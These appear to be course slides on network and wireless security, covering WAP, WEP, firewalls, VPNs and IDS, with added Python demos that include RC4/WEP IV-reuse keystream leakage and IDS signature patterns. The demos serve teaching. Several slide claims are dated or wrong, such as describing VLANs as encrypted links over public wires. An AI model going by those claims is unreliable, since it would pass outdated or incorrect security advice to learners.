 Disbanded after efforts in this area were mostly successful
Wireless Application Protocol (WAP)
 Open, global specification created by the WAP Forum
 Designed to deliver information and services to users of handheld digital devices
 Compatible with most wireless networks
 Can be built on any operating system
WAP-Enabled Devices
How WAP 1.x Works
 WAP 1.x Stack
o Set of protocols created by the WAP Forum that alters the OSI model
o Five layers lie within the top four (of seven) layers of the OSI model
o Leaner than the OSI model
 Each WAP protocol makes data transactions as compressed as possible and allows for more dropped packets than the OSI model
WAP 1.x Stack Compared to OSI/Web Stack

Differences Between Wireless and Wired Data Transfer
 WAP 1.x stack protocols require that data communications between clients (wireless devices) and servers pass through a WAP gateway
 Network architectural structures
WAP versus Wired Network
The WAP 2.0 Stack
 Eliminates the use of WTLS; relies on a lighter version of TLS, the same protocol used on the common Internet stack, which allows end-to-end security and avoids any WAP gaps
 Replaces all other layers of WAP 1.x with standard Internet layers
 Still supports the WAP 1.x stack in order to facilitate legacy devices and systems
Additional WAP 2.0 Features
 WAP Push
 User agent profile
 Wireless Telephony Application
 Extended Functionality Interface (EFI)
 Multimedia Messaging Service (MMS)
Wireless Transport Layer Security (WTLS) Protocol
 Provides authentication, data encryption, and privacy for WAP 1.x users
 Three classes of authentication
o Class 1
 Anonymous; does not allow either the client or the gateway to authenticate the other
o Class 2
 Only allows the client to authenticate the gateway
o Class 3
 Allows both the client and the gateway to authenticate each other

WTLS Protocol: Steps of Class 2 Authentication
1. WAP device sends a request for authentication
2. Gateway responds, then sends a copy of its certificate, which contains the gateway's public key, to the WAP device
3. WAP device receives the certificate and public key and generates a unique random value, which it encrypts with the gateway's public key and sends to the gateway
4. WAP gateway receives the encrypted value and uses its own private key to decrypt it; both sides now share the secret from which the session keys are derived
WTLS Security Concerns
 Security threats posed by the WAP gap (traffic is decrypted and re-encrypted at the gateway, so it is exposed there)
 Unsafe use of service set identifiers (SSIDs)

Wired Equivalent Privacy (WEP)
 Optional security protocol for wireless local area networks defined in the original 802.11 standard (and carried into 802.11b)
 Designed to provide the same level of security as a wired LAN
 Not considered adequate security without also implementing a separate authentication process and providing for external key management; since these slides were written it has been broken outright (keys are recoverable from captured traffic in minutes), so WEP must not be used
Wireless LAN (WLAN)
 Connects clients to network resources using radio signals to pass data through the ether
 Employs wireless access points (AP)
o Connected to the wired LAN
o Act as radio broadcast stations that transmit data to clients equipped with wireless network interface cards (NICs)
How a WLAN Works
How WEP Works
 Uses a symmetric key (shared key) to authenticate wireless devices (not wireless device users) and to guarantee the integrity of data by encrypting transmissions
 Each of the APs and clients needs to share the same key
 Client sends a request to the AP asking for permission to access the wired network
 If WEP has not been enabled (the default), the AP allows the request to pass
 If WEP has been enabled, the client begins a challenge-and-response authentication process
WEP's Weaknesses
 Problems related to the initialization vector (IV) that it uses to encrypt data and ensure its integrity
o The IV is only 24 bits and is transmitted in the clear in every frame, so it can be picked up by hackers
o It is reused on a regular basis: the IV space is exhausted in hours on a busy network, and two frames encrypted under the same IV share the same RC4 keystream, so XORing their ciphertexts reveals the XOR of their plaintexts
 Problems with how it handles keys: the per-frame RC4 key is simply the IV followed by the shared key, a construction that lets an attacker who collects enough frames recover the shared key itself
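The IV weakness above made concrete, as an added example in Python (not the slides' code, and not a complete WEP implementation: the integrity check value and the key-recovery attack are left out). It implements RC4, builds the per-frame key the way WEP does (IV followed by the shared key), shows that two frames encrypted under one IV leak the XOR of their plaintexts, and computes how few frames a 24-bit IV survives. The key and frames are constructed.

```python
import math


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher, WEP's cipher. Educational only: RC4 is broken and prohibited in TLS (RFC 7465)."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation, XORed with the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: the 24-bit IV travels in the clear and is prepended to the shared key (ICV omitted)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + rc4(iv + shared_key, plaintext)


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    """The receiver rebuilds the same per-frame key from the IV it can read off the frame."""
    return rc4(frame[:3] + shared_key, frame[3:])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def iv_reuse_leak(frame1: bytes, frame2: bytes) -> bytes:
    """Two frames with the same IV use the same keystream, so XORing the ciphertexts cancels it and
    leaves plaintext1 XOR plaintext2: known plaintext for one frame decrypts the other outright."""
    if frame1[:3] != frame2[:3]:
        raise ValueError("different IVs: no direct leak")
    return xor_bytes(frame1[3:], frame2[3:])


def frames_until_iv_collision(p: float = 0.5) -> int:
    """Birthday bound: frames needed before a randomly chosen 24-bit IV repeats with probability p.
    Cards that instead count IVs sequentially wrap after 2**24 frames, a few hours of busy traffic."""
    n = 2 ** 24
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - p))))


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"                       # constructed 40-bit shared key
    f1 = wep_encrypt(key, b"\x00\x00\x01", b"ATTACK AT DAWN")
    f2 = wep_encrypt(key, b"\x00\x00\x01", b"RETREAT AT DUSK")  # same IV reused
    print(iv_reuse_leak(f1, f2) == xor_bytes(b"ATTACK AT DAWN", b"RETREAT AT DUSK"))
    print(frames_until_iv_collision())
```

Fewer than 5,000 frames for a 50% chance of a repeated IV means a busy access point repeats keystreams within minutes; predictable traffic such as ARP requests supplies the known plaintext, and that is before the separate weak-key attack that recovers the shared key itself.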
Other WLAN Security Loopholes
 War driving
 Unauthorized users can attach themselves to WLANs and use their resources, set up their own access points, and jam the network
 WEP authenticates clients, not users
 Wireless network administrators and users must be educated about the inherent insecurity of wireless systems and the need for care
Conducting a Wireless Site Survey
1. Conduct a needs assessment of network users
2. Obtain a copy of the site's blueprint
3. Do a walk-through of the site
4. Identify possible access point locations
5. Verify access point locations
6. Document findings

Instant Messaging (IM)
 AOL Instant Messenger (AIM)
 MSN Messenger
 Yahoo! Messenger
 ICQ
 Internet Relay Chat (IRC)
Definition of IM
 Uses a real-time communication model
 Allows users to keep track of the online status and availability of other users who are also using IM applications
 Can be used on both wired and wireless devices
 Easy and fast
 Operates in two models:
o Peer-to-peer model
 May cause the client to expose sensitive information
o Peer-to-network model
 Risk of network outage and DoS attacks making IM communication unavailable
Problems Facing IM
 Lack of default encryption enables packet sniffing
 Social engineering overcomes even encryption

Technical Issues Surrounding IM
 File transfers
 Application sharing
Legal Issues Surrounding IM
 Possible threat of litigation or criminal indictment should the wrong message be sent or overheard by the wrong person
 Currently immune to most corporate efforts to control it
 Must be monitored in real time

Blocking IM
 Install a firewall to block the ports that IM products use; IM will be unavailable to all employees
 Limited blocking not currently possible
Cellular Phone Short Message Service (SMS)
 Messages are typed and sent immediately
 Problems
o Tracking inappropriate messages
o Risk of having messages sniffed
Chapter Summary
 Efforts of IEEE, specifically the 802.11x standards, to standardize wireless security
 Security issues related to dominant wireless protocols
o WAP
 Connects mobile telephones, PDAs, pocket computers, and other mobile devices to the Internet
o WEP
 Used in WLANs
 WTLS protocol
 Conducting a site survey in advance of building a WLAN
 Security threats related to using IM
Chapter 9
Devices
Learning Objectives
 Understand the purpose of a network firewall and the kinds of firewall technology available on the market
 Understand the role of routers, switches, and other networking hardware in security
 Determine when VPN or RAS technology works to provide a secure network connection
Firewalls
 Hardware or software device that provides a means of securing a computer or network from unwanted intrusion
o Dedicated physical device that protects the network from intrusion
o Software feature added to a router, switch, or other device that prevents traffic to or from part of a network

Management Cycle for Firewall Protection
1. Draft a written security policy
2. Design the firewall to implement the policy
3. Implement the design by installing the selected hardware and software
4. Test the firewall
5. Review new threats, requirements for additional security, and updates to systems and software; repeat the process from the first step
Drafting a Security Policy
 What am I protecting?
 From whom?
 What services does my company need to access over the network?
 Who gets access to what resources?
 Who administers the network?

Available Targets and Who Is Aiming at Them
 Common areas of attack
o Web servers
o Mail servers
o FTP servers
o Databases
 Intruders
o Sport hackers
o Malicious hackers
Who Gets Access to Which Resources?
 List employees or groups of employees along with the files and file servers and databases and database servers they need to access
 List which employees need remote access to the network
Who Administers the Network?
 Determine the individual(s) and the scope of individual management control

Designing the Firewall to Implement the Policy
 Select the appropriate technology to deploy the firewall
What Do Firewalls Protect Against?
 Denial of service (DoS)
 Ping of death
 Teardrop or Raindrop attacks
 SYN flood
 LAND attack
 Brute force or smurf attacks
 IP spoofing

How Do Firewalls Work?
 Network address translation (NAT)
 Basic packet filtering
 Stateful packet inspection (SPI)
 Application gateways
 Access control lists (ACL)
Network Address Translation (NAT)
Only technique used by basic firewalls
Enables a LAN to use one set of IP addresses for internal traffic and a second set for external traffic
Each active connection requires a unique external address for duration of communication
Port address translation (PAT)
o Derivative of NAT
o Supports thousands of simultaneous connections on a single public IP address
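The PAT mechanism described above, as an added example that is not part of the original slides: each inside (address, port) pair gets its own port on one public address, and inbound packets are forwarded only when they match an existing mapping. All IP addresses and the starting port number are constructed values.

```python
# Added example (constructed addresses, not the slides' own code): a minimal
# port address translation (PAT) table for one public IP.
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]   # (ip address, port)

@dataclass
class PatTable:
    public_ip: str
    next_port: int = 40000      # first public port handed out (constructed)
    outbound: Dict[Endpoint, int] = field(default_factory=dict)  # inside -> public port
    inbound: Dict[int, Endpoint] = field(default_factory=dict)   # public port -> inside

    def translate_out(self, src: Endpoint) -> Endpoint:
        """Rewrite the source of an outbound packet to (public_ip, unique port)."""
        if src not in self.outbound:
            port = self.next_port
            self.next_port += 1
            self.outbound[src] = port
            self.inbound[port] = src
        return (self.public_ip, self.outbound[src])

    def translate_in(self, dst: Endpoint) -> Optional[Endpoint]:
        """Map an inbound packet back to the inside host, or None to drop it.

        Unsolicited inbound traffic matches no mapping, which is why a PAT
        device hides inside hosts even without explicit filter rules.
        """
        ip, port = dst
        if ip != self.public_ip:
            return None
        return self.inbound.get(port)

if __name__ == "__main__":
    pat = PatTable("203.0.113.10")                     # constructed public IP
    a = pat.translate_out(("192.168.1.20", 51000))
    b = pat.translate_out(("192.168.1.21", 51000))     # same inside port, other host
    print(a, b)                                        # two distinct public ports
    print(pat.translate_in(a))                         # reply reaches 192.168.1.20
    print(pat.translate_in(("203.0.113.10", 22)))      # unsolicited: None, dropped
```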
Basic Packet Filtering
Firewall system examines each packet that enters it and allows through only those packets that match a predefined set of rules
Can be configured to screen information based on many data fields:
o Protocol type
o IP address
o TCP/UDP port
o Source routing information
Stateful Packet Inspection (SPI)
Controls access to network by analyzing incoming/outgoing packets and letting them pass or not based on IP addresses of source and destination
o Examines a packet based on information in its header
Enhances security by allowing the filter to distinguish on which side of the firewall a connection was initiated; essential to blocking IP spoofing attacks

Access Control Lists (ACL)
Rules built according to organizational policy that define who can access portions of the network
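The packet-filtering, stateful-inspection and ACL ideas from the three slides above, combined in one added example that is not part of the original slides: outbound connections from the inside create state, replies to that state are admitted, and any other inbound packet must be a new connection to a service an ACL rule permits. The inside prefix, addresses and rules are constructed values.

```python
# Added example (constructed addresses and rules, not the slides' own code):
# a toy stateful packet filter with an ACL for permitted inbound services.
from dataclasses import dataclass
from typing import List, Set, Tuple

INTERNAL_NET = "10.0.0."    # constructed inside address prefix

@dataclass(frozen=True)
class Packet:
    direction: str          # "in" from the Internet, "out" from the LAN
    proto: str              # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int
    syn: bool = False       # TCP SYN flag: marks a new connection

@dataclass(frozen=True)
class Rule:
    """ACL entry permitting new inbound connections to one service."""
    proto: str
    dst: str
    dport: int

class StatefulFilter:
    def __init__(self, acl: List[Rule]):
        self.acl = acl
        # connections opened from inside: (proto, in_ip, in_port, out_ip, out_port)
        self.state: Set[Tuple[str, str, int, str, int]] = set()

    def check(self, p: Packet) -> bool:
        """True if the packet may pass."""
        if p.direction == "out":
            if not p.src.startswith(INTERNAL_NET):   # egress anti-spoofing
                return False
            self.state.add((p.proto, p.src, p.sport, p.dst, p.dport))
            return True
        if p.src.startswith(INTERNAL_NET):           # inside address arriving
            return False                             # from outside: spoofed
        if (p.proto, p.dst, p.dport, p.src, p.sport) in self.state:
            return True                              # reply to inside-initiated
        # Anything else must be a new connection to an ACL-permitted service
        new_conn = p.syn if p.proto == "tcp" else True
        return new_conn and any(r.proto == p.proto and r.dst == p.dst
                                and r.dport == p.dport for r in self.acl)
```

A stateless filter would have to admit every inbound packet with a plausible source port to let replies through; the state table is what lets the firewall tell a genuine reply from a forged one.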
Routers
Network management device that sits between network segments and routes traffic from one network to another
Allows networks to communicate with one another
Allows Internet to function
Acts as digital traffic cop (with addition of packet filtering)

How a Router Moves Information
Examines electronic envelope surrounding a packet; compares address to list of addresses contained in the router's lookup tables
Determines which router to send the packet to next, based on changing network conditions
How a Router Moves Information

Beyond the Firewall
Demilitarized zone (DMZ)
Bastion hosts (potentially)
Demilitarized Zone
Area set aside for servers that are publicly accessible or have lower security requirements
Sits between the Internet and the internal network's line of defense
o Stateful device fully protects other internal systems
o Packet filter allows external traffic only to services provided by DMZ servers
Allows a company to host its own Internet services without permitting unauthorized access to its private network
Bastion Hosts
Computers that reside in a DMZ and that host Web, mail, DNS, and/or FTP services
Gateway between an inside network and an outside network
Defends against attacks aimed at the inside network; used as a security measure
Unnecessary programs, services, and protocols are removed; unnecessary network ports are disabled
Do not share authentication services with trusted hosts within the network

Application Gateways
Also known as proxy servers
Monitor specific applications (FTP, HTTP, Telnet)
Allow packets accessing those services to go to only those computers that are allowed
Good backup to packet filtering
Application Gateways
Security advantages
o Information hiding
o Robust authentication and logging
o Simpler filtering rules
Disadvantage
o Two steps are required to connect inbound or outbound traffic; can increase processor overhead

OSI Reference Model
Architecture that classifies most network functions
Seven layers
o Application
o Presentation
o Session
o Transport
o Network
o Data-Link
o Physical
The OSI Stack
Layers 4 and 5
o Where TCP and UDP ports that control communication sessions operate
Layer 3
o Routes IP packets
Layer 2
o Delivers data frames across LANs
Limitations of Packet-Filtering Routers
ACL can become long, complicated, and difficult to manage and comprehend
Throughput decreases as number of rules being processed increases
Unable to determine specific content or data of packets at layers 3 through 5

Switches
Provide same function as bridges (divide collision domains), but employ application-specific integrated circuits (ASICs) that are optimized for the task
Reduce collision domain to two nodes (switch and host)
Main benefit over hubs
o Separation of collision domains limits the possibility of sniffing
Switches

Switch Security
ACLs
Virtual Local Area Networks (VLANs)
Virtual Local Area Network
Uses public wires to connect nodes
Broadcast domain within a switched network
Uses encryption and other security mechanisms to ensure that
o Only authorized users can access the network
o Data cannot be intercepted
Clusters users in smaller groups
o Increases security from hackers
o Reduces possibility of broadcast storm

Security Problems with Switches
Common ways of switch hijacking
o Try default passwords which may not have been changed
o Sniff network to get administrator password via SNMP or Telnet
Securing a Switch
Isolate all management interfaces
Manage switch by physical connection to a serial port or through secure shell (SSH) or other encrypted method
Use separate switches or hubs for DMZs to physically isolate them from the network and prevent VLAN jumping

continued

Securing a Switch
Put switch behind dedicated firewall device
Maintain the switch; install latest version of software and security patches
Read product documentation
Set strong passwords
Example of a Compromised VLAN

Wireless
Almost anyone can eavesdrop on a network communication
Encryption is the only secure method of communicating with wireless technology
Modems

DSL versus Cable Modem Security
DSL
o Direct connection between computer/network and the Internet
Cable modem
o Connected to a shared segment; party line
o Most have basic firewall capabilities to prevent files from being viewed or downloaded
o Most implement the Data Over Cable Service Interface Specification (DOCSIS) for authentication and packet filtering
Dynamic versus Static IP Addressing
Static IP addresses
o Provide a fixed target for potential hackers
Dynamic IP addresses
o Provide enhanced security
o By changing IP addresses of client machines, DHCP server makes them moving targets for potential hackers
o Assigned by the Dynamic Host Configuration Protocol (DHCP)

Remote Access Service (RAS)
Provides a mechanism for one computer to securely dial in to another computer
Treats modem as an extension of the network
Includes encryption and logging
Accepts incoming calls
Should be placed in the DMZ
Security Problems with RAS
Behind physical firewall; potential for network to be compromised
Most RAS systems offer encryption and callback as features to enhance security

Telecom/Private Branch Exchange (PBX)
PBX
o Private phone system that offers features such as voicemail, call forwarding, and conference calling
o Failure to secure a PBX can result in toll fraud, theft of information, denial of service, and enhanced susceptibility to legal liability
IP-Based PBX

PBX Security Concerns
Remote PBX management
Hoteling or job sharing
o Many move codes are standardized and posted on the Internet
Virtual Private Networks
Provide secure communication pathway or tunnel through public networks (e.g., Internet)
Lowest levels of TCP/IP are implemented using existing TCP/IP connection
Encrypts either underlying data in a packet or the entire packet itself before wrapping it in another IP packet for delivery
Further enhances security by implementing Internet Protocol Security (IPSec)
Internet Protocol Security (IPSec)
Allows encryption of either just the data in a packet (transport mode) or the packet as a whole (tunnel mode)
Enables a VPN to eliminate packet sniffing and identity spoofing
Requirement of Internet Protocol version 6 (IPv6) specification

Intrusion Detection Systems (IDS)
Monitor networks and report on unauthorized attempts to access any part of the system
Available from many vendors
Forms
o Software (computer-based IDS)
o Dedicated hardware devices (network-based IDS)
Types of detection
o Anomaly-based detection
o Signature-based detection
Computer-based IDS
Software applications (agents) are installed on each protected computer
o Make use of disk space, RAM, and CPU time to analyze OS, applications, system audit trails
o Compare these to a list of specific rules
o Report discrepancies
Can be self-contained or remotely managed
Easy to upgrade software, but do not scale well

Network-based IDS
Monitors activity on a specific network segment
Dedicated platforms with two components
o Sensor: passively analyzes network traffic
o Management system: displays alarm information from the sensor
Anomaly-based Detection
Builds statistical profiles of user activity and then reacts to any activity that falls outside these profiles
Often leads to large number of false positives
o Users do not access computers/network in static, predictable ways
o Cost of building a sensor that could hold enough memory to contain the entire profile and time to process the profiles is prohibitively large
Signature-based Detection
Similar to antivirus program in its method of detecting potential attacks
Vendors produce a list of signatures used by the IDS to compare against activity on the network or host
When a match is found, the IDS takes some action (e.g., logging the event)
Can produce false positives; normal network activity may be construed as malicious
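The two detection types from the anomaly-based and signature-based slides above, as one added example that is not part of the original slides: a per-user statistical profile built from a baseline, and a fixed signature list matched against log lines. The baseline counts, the threshold k, the signature patterns and the log lines are all constructed, and the run shows the false-positive case the slides warn about (a legitimate user on an unusually busy day).

```python
# Added example (constructed data, not the slides' own): anomaly profiles
# from a baseline beside a fixed signature list, the two IDS detection types.
import re
import statistics
from typing import Dict, List, Tuple

# Baseline: daily login count per user over the past week (constructed)
BASELINE: Dict[str, List[int]] = {
    "alice": [3, 4, 3, 5, 4, 3, 4],
    "bob": [1, 1, 2, 1, 1, 2, 1],
}

def anomaly_alerts(today: Dict[str, int], k: float = 3.0) -> List[str]:
    """Flag users whose count today lies outside mean +/- k*stdev."""
    alerts = []
    for user, count in today.items():
        hist = BASELINE.get(user)
        if hist is None:                 # no profile yet: treat as anomalous
            alerts.append(user)
            continue
        mean = statistics.mean(hist)
        sd = statistics.pstdev(hist) or 1.0   # flat profile: avoid zero width
        if abs(count - mean) > k * sd:
            alerts.append(user)
    return alerts

# Signature list (name, pattern); patterns are constructed illustrations
SIGNATURES: List[Tuple[str, re.Pattern]] = [
    ("ping-of-death", re.compile(r"ICMP .* len=\d{5,}")),
    ("syn-flood", re.compile(r"TCP SYN .* count=[1-9]\d{3,}")),
]

def signature_alerts(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (signature name, log line) for every matching line."""
    return [(name, line) for line in lines
            for name, pat in SIGNATURES if pat.search(line)]

if __name__ == "__main__":
    # alice: a legitimately busy day still trips the profile (false positive)
    print(anomaly_alerts({"alice": 9, "bob": 1, "mallory": 2}))
    print(signature_alerts([
        "ICMP echo from 198.51.100.3 len=64",
        "ICMP echo from 198.51.100.3 len=65510",
        "TCP SYN to 10.0.0.80:80 count=12000",
    ]))
```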
Network Monitoring and Diagnostics
Essential steps in ensuring safety and health of a network (along with IDS)
Can be either stand-alone or part of a network-monitoring platform
o HP's OpenView
o IBM's Netview/AIX
o Fidelia's NetVigil
o Aprisma's Spectrum
Ensuring Workstation and Server Security
Remove unnecessary protocols such as NetBIOS or IPX
Remove unnecessary user accounts
Remove unnecessary shares
Rename the administrator account
Use strong passwords

Personal Firewall Software Packages
Offer application-level blocking, packet filtering, and can put your computer into stealth mode by turning off most if not all ports
Many products available, including:
o Norton Firewall
o ZoneAlarm
o Black Ice Defender
o Tiny Software's Personal Firewall
Firewall Product Example

Antivirus Software Packages
Necessary even on a secure network
Many vendors, including:
o McAfee
o Norton
o Computer Associates
o Network Associates
Mobile Devices
Can open security holes for any computer with which these devices communicate

Chapter Summary
Virtual isolation of a computer or network by implementing a firewall through software and hardware techniques:
o Routers
o Switches
o Modems
o Various software packages designed to run on servers, workstations, and PDAs

continued
Chapter Summary
Virtual private networks (VPNs)
Private branch exchanges (PBX)
Remote Access Services (RAS)
Chapter 10
Media and Medium

Learning Objectives
Identify and discuss the various types of transmission media
Explain how to physically protect transmission media adequately
Identify and discuss the various types of storage media
Know how to lessen the risk of catastrophic loss of information

continued
Learning Objectives
Understand the various ways to encrypt data
Properly maintain or destroy stored data

Transmission Media
Coaxial cable
Twisted pair copper cable
o Shielded
o Unshielded
Fiber-optic cable
Wireless connections
Coaxial Cable
Hollow outer cylinder surrounds a single inner wire conductor

Coaxial Cable
More expensive than traditional telephone wiring
Less prone to interference
Typically carries larger amounts of data
Easily spliced; allows unauthorized users access to the network
Two types (not interchangeable)
o 50-ohm
o 75-ohm
50-Ohm Coaxial Cable
Uses unmodulated signal over a single channel
Two standards
o 10Base2 (ThinNet)
o 10Base5 (ThickNet)

50-Ohm Coaxial Cable
Advantages
o Simple to implement and widely available
o Low cost alternative that provides relatively high rates of data transmission
Disadvantages
o Can only carry data and voice
o Limited in distance it can transmit signals
10Base2 (ThinNet)
Uses a thin coaxial cable in an Ethernet environment
Capable of covering up to 180 meters
Allows daisy chaining
Not highly susceptible to noise interference
Transmits at 10 Mbps
Can support up to 30 nodes per segment

10Base5 (ThickNet)
Primarily used as a backbone in an office LAN environment
Often connects wiring closets
Can transmit data at speeds up to 10 Mbps
Covers distances up to 500 meters
Can accommodate up to 100 nodes per segment
Rigid and difficult to work with
75-ohm Coaxial Cable
For analog signaling and high-speed digital signaling

75-ohm Coaxial Cable
Advantages
o Allows for data, voice, and video capabilities
o Can cover greater distances and offers more bandwidth
Disadvantages
o Requires hardware to connect via modems
o More difficult to maintain
Twisted Pair Copper Cable
Individual copper wires are twisted together to prevent cross talk between pairs and to reduce effects of EMI and RFI
Inexpensive alternative to coaxial cable, but cannot support the same distances
Long been used by telephone companies
Types
o Unshielded twisted pair (UTP)
o Shielded twisted pair (STP)

Unshielded Twisted Pair (UTP)
Most common medium for both voice and data
Currently supports up to 1 Gbps protocols
Shielded Twisted Pair (STP)
Extra foil shield wrapped between copper pairs provides additional insulation from EMI
Used extensively in LAN wiring

Shielded Twisted Pair (STP)
Twisted Pair Categories
Category 3 (CAT 3)
Category 5 (CAT 5)
Category 6 (CAT 6)

Twisted Pair CAT 3
For voice and data transmission